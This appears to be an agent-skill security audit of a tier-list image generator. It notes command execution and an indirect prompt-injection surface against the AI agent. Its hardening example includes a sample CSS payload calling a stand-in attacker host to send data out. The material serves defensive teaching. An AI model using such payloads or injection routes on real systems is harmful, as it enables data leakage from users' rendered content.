tier-list-image
Pass
Audited by Gen Agent Trust Hub on Mar 12, 2026
Risk Level: SAFE
COMMAND_EXECUTION
PROMPT_INJECTION
Full Analysis
- [COMMAND_EXECUTION]: The script `scripts/render-tier-list.mjs` executes the `agent-browser` command-line tool via the Node.js `spawn` method. This utility is used to render the generated HTML and capture the final screenshot. This is a core part of the skill's functionality.
- [PROMPT_INJECTION]: The skill processes user-controlled data such as titles, item descriptions, and tier labels, and embeds them into an HTML template for rendering. This creates a surface for indirect prompt injection.
- Ingestion points: User-provided tier list specification JSON processed in `scripts/generate-html.mjs`.
- Boundary markers: Data is structured within a JSON schema, but no delimiters or "ignore" instructions are added to the rendered HTML to signal non-executable content to the browser rendering engine.
- Capability inventory: The skill has local file system write access and can execute the `agent-browser` CLI.
- Sanitization: Content is passed through an `escapeHtml` function, which mitigates common HTML injection by escaping characters such as `<` and `>`, but does not cover CSS injection via the tier color property or other injection vectors that HTML escaping does not address.
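The Sanitization finding above turns on a context mismatch: `escapeHtml` neutralises a label interpolated into HTML text, but the tier color is interpolated into a `style` attribute, which is a CSS context where `;` and `url(` survive escaping untouched. The following is an added example written for this page, not the skill's own code: it shows an HTML-escaping helper beside a hex-only allow-list for the color, renders one constructed tier entry both ways, and exposes a check function for the result. The function names, the HTML snippet and the sample tier are assumptions, not taken from `scripts/generate-html.mjs`.

```javascript
// Added example, not the skill's own code. escapeHtml, safeColor and the
// render functions are assumed names; the HTML snippet stands in for the
// skill's template, and constructedTier is sample input built for this page.

// Escape the five characters that matter in HTML text and attribute contexts.
function escapeHtml(value) {
  return String(value)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

// Allow-list for the colour: a hex value only (#rgb, #rgba, #rrggbb, #rrggbbaa).
// Anything else falls back to a neutral default instead of reaching the style attribute.
const HEX_COLOR = /^#(?:[0-9a-fA-F]{3,4}|[0-9a-fA-F]{6}|[0-9a-fA-F]{8})$/;
const DEFAULT_COLOR = "#888888";

function safeColor(value) {
  const s = String(value).trim();
  return HEX_COLOR.test(s) ? s.toLowerCase() : DEFAULT_COLOR;
}

// Rendering with escapeHtml alone: the label is neutralised, but the colour is
// interpolated into CSS, where ';' and 'url(' are not escaped characters.
function renderTierEscapedOnly(tier) {
  return `<div class="tier" style="background:${escapeHtml(tier.color)}">` +
    `<span class="label">${escapeHtml(tier.label)}</span></div>`;
}

// Hardened rendering: the colour must pass the allow-list before interpolation.
function renderTierSafe(tier) {
  return `<div class="tier" style="background:${safeColor(tier.color)}">` +
    `<span class="label">${escapeHtml(tier.label)}</span></div>`;
}

// Constructed tier entry: HTML payload in the label, CSS payload in the colour.
// The host name is a placeholder, not a real endpoint.
const constructedTier = {
  label: "S <script>alert(1)</script>",
  color: "red;background:url(https://attacker.example/exfil?d=1)",
};

// Returns true when the CSS payload reaches the style attribute under the given renderer.
function cssPayloadSurvives(render) {
  return render(constructedTier).includes("url(https://attacker.example");
}

console.log(renderTierEscapedOnly(constructedTier));
console.log(renderTierSafe(constructedTier));
```

Run with `node`: the first line printed still carries `background:url(https://attacker.example/...)` inside the `style` attribute even though every `<` and `"` was escaped, while the second collapses the color to `#888888`. If the skill needs named colors as well, extend the allow-list with a fixed set of names rather than relaxing it to free text; the property here is that no user-supplied byte reaches the CSS context unless it matched the pattern.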
Audit Metadata